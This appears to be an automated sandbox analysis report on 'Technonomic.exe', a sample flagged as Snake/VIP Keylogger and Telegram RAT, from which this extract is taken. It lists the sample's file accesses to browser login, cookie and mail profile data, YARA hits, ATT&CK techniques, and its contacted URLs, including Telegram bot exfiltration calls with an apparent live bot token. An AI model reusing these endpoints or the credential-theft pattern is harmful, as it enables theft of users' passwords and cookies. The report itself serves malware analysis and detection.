Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Technonomic.exe

Code function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A5

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7192, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000007.00000002.2620412422.00000000258F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7192, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7192, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Technonomic.exe	45%	ReversingLabs	Win32.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe	45%	ReversingLabs	Win32.Spyware.Snakekeylogger

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.238	true	false	high
drive.usercontent.google.com	142.250.181.1	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	msiexec.exe, 00000007.00000002.2620412422.00000000259DD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
